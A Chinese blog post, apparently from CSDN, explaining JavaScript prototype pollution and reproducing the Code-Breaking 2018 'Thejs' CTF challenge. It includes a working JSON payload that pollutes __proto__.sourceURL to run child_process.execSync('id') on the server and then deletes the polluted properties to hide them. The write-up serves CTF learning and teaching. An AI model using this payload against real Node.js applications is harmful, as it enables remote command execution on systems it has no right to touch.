原型链污染

最新推荐文章于 2023-09-05 16:46:56 发布
最新推荐文章于 2023-09-05 16:46:56 发布
阅读量797 收藏
点赞数
文章标签: 原型模式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66175055/article/details/132242497
版权

一 原型链污染原理
prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法
一个对象的__proto__属性,指向这个对象所在的类的prototype属性
例如 foo.__proto__指向的是Foo类的prototype。那么,如果我们修改了foo.__proto__中的值,意味着就可以修改Foo类

 

二,简单的原型链污染实验

foo是一个简单的JavaScript对象

foo.bar 此时为1

 

由于查找顺序的原因,foo.bar仍然是1 

此时再用Object创建一个空的zoo对象 

查看zoo.bar

查看结果 

 分析

三, Code-Breaking 2018 Thejs原型链污染复现

1,运用的知识点

 

2,原理分析 //…merge 给sourceURL赋值 实现任意命令执行 通过原型链污染实现// 

//…new Function(x, ‘return y’) 相当于function add(x){ return }// 

 

{"__proto__": {"sourceURL": "\u000areturn ()=>{for (var a in {}) {delete Object.prototype[a];} 
return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}

 

//nodejs中有一个模块叫做process process底下有一个子模块叫chid_process
,其下有一个方法叫做execSync(‘whoami’)执行命令//

return global.process.mainModule.constructor._load(‘child_process’).execSync(‘id’)}\u000a//"}}
让原来的return失效,新的return把它替换掉 通过\u000a换行符把return换下来,再注释掉

{“proto”: {“sourceURL”: "\u000areturn ()=>{for (var a in {})
{delete Object.prototype[a];} 干什么?为了不让其他人看见这个flag,所以我把这个flag删除了
//{delete Object.prototype[a];}将object对象中的所有属性循环出来,再进行删除
三,复现

 

肖申克G
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原型链污染漏洞+前后端实战案例
08-04
原型链污染漏洞+前后端实战案例
js原型链污染(超详细)
qq_51586883的博客
08-23 5708
js创建对象的三种方法 : 普通创建 var person={name:'lihuaiqiu','age','19'} ​ var person={} //创建空对象 构造函数方法创建 function person(){ this.name="liahuqiu"; this.test=function () { return 23333; ​ } } person.prototype.a=3; web=new person(); console.l...
安全基础 --- 原型链污染
weixin_62443409的博客
09-05 6520
prototype:一个类的属性,所有类对象在实例化的时候会拥有prototype中的属性和方法__proto__:一个对象的__proto__属性,指向这个对象所在的类的prototype属性如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染
nodejs原型链污染基础
qq_63928796的博客
02-06 693
原型链污染是一种针对JavaScript运行时的注入攻击。通过原型链污染,攻击者可能控制对象属性的默认值。这允许攻击者篡改应用程序的逻辑,还可能导致拒绝服务,或者在极端情况下,远程执行代码。比较出名的一个原型链污染漏洞,是在2019年初,在Snyk的安全研究人员透露出流行的JavaScript库—Lodash的严重的漏洞,这允许黑客攻击多个web应用程序。漏洞细节:https://security.snyk.io/vuln/SNYK-JS-LODASH-450202。
网络安全--原型链污染
m0_69435261的博客
08-02 1297
在对象son中寻找last_name如果找不到,则在中寻找last_name如果仍然找不到,则继续在中寻找last_name依次寻找,直到找到null结束。比如,的__proto__就是null。
【技术分享】从浅入深 Javascript 原型链原型链污染 .pdf
09-05
【技术分享】从浅入深 Javascript 原型链原型链污染 APT web安全 网络安全 安全 自动化
JavaScript不使用prototype和new实现继承机制
01-19
 传统的JavaScript继承基于prototype原型链,并且需要使用大量的new操作,代码不够简洁,可读性也不是很强,貌似还容易受到原型链污染。  笔者总结的继承方式,简洁明了,虽然不是最好的方式,但希望能给读者带来...
利用不到200行代码写一款属于你自己的js类库
01-21
原型链与继承 接下来我会对类库的核心api进行讲解和展示,文章最后后附带类库的完整源码,在我之前的文章《3分钟教你用原生js实现具有进度监听的文件上传预览组件》中也使用了类似的方式,感兴趣的可以一起学习,...
JavaScript 45 道面试题及答案.docx
07-09
JavaScript 原型链(Prototype Chain) ----------------------------- 每个对象都会在其内部初始化一个属性,就是 prototype(原型),当我们访问一个对象的属性时,如果这个对象内部不存在这个属性,那么他就会去...
渗透攻击漏洞之——原型链污染
weixin_51525416的博客
08-02 3329
JavaScript 中所有的对象都有一个内置属性,称为它的prototype(原型)。它本身是一个对象,故原型对象也会有它自己的原型,逐渐构成了原型链原型链终止于拥有null作为其原型的对象上。指向对象原型的属性并不是prototype。它的名字不是标准的,但实际上所有浏览器都使用__proto__。访问对象原型的标准方法是 Object.getPrototypeOf()。JavaScript 规定,所有对象都有自己的原型对象(prototype)。
记录js原型链污染
RuiLike的博客
05-17 153
对象.proto=构造器(构造函数).prototype构造器.prototype其实也是一个对象,为构造函数的原型对象,同样有__proto__属性,一直通过原型链__proto__最终可找到null。我们可以通过Foo.prototype来访问Foo类的原型,但Foo实例化出来的对象,是不能通过prototype访问原型的。这时候,就该__proto__登场了。
Python原型链污染
Elite的博客
07-23 865
Python 中的原型链污染(Prototype Pollution)是指通过修改对象原型链中的属性,对程序的行为产生意外影响或利用漏洞进行攻击的一种技术。
简单介绍原型链污染
qq_51770207的博客
09-15 1151
快速了解什么是原型链污染
nodejs原型链污染
yink12138的博客
01-10 3300
nodejs原型链污染
JavaScript原型链污染攻击
BerL1n
07-18 7152
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js中你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
原型污染和猴子补丁 Prototype Pollution and Monkey-Patching
JackZhang的专栏
03-26 1431
原型对象是JavaScript模拟类并实现继承的灵魂。但要用好并不容易,这一篇介绍两个典型的问题:原型污染和猴子补丁
解决全局变量污染
梦里回忆-专栏
10-10 3479
1、之前的问题: 用过jQuery的人就知道其主要的变量符号就是$没错因此很多项目的开发人 员也要学就自己把$定义成别的含义了我心里对其是无敌的鄙视跟厌恶。 我曾经拿过一个项目使用jQuery的然后上头要我使用一个已有的富文本编辑 器这样就有两个JS文件了 jquery.js和editor.js于是我要开始写该页面的逻辑了我发现editor.js 里边自定义了$符号
ctfshow 原型链污染
最新发布
10-14
好的,你的问题是关于原型链污染的。原型链污染是一种攻击方式,通过修改目标对象的原型链来实现攻击目的。攻击者可以通过修改原型链来篡改对象的属性或方法,从而达到攻击的目的。 例如,攻击者可以通过修改Object.prototype来污染整个JavaScript环境,使得所有对象都受到影响。攻击者还可以通过修改特定对象的原型链来实现特定的攻击目的,比如窃取用户的敏感信息。 为了防止原型链污染攻击,开发者应该遵循以下几个原则: 1. 不要轻易地修改Object.prototype或其他内置对象的原型链。 2. 使用Object.create(null)创建纯净的对象,避免继承Object.prototype带来的风险。 3. 使用Object.freeze()冻结对象,避免被篡改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值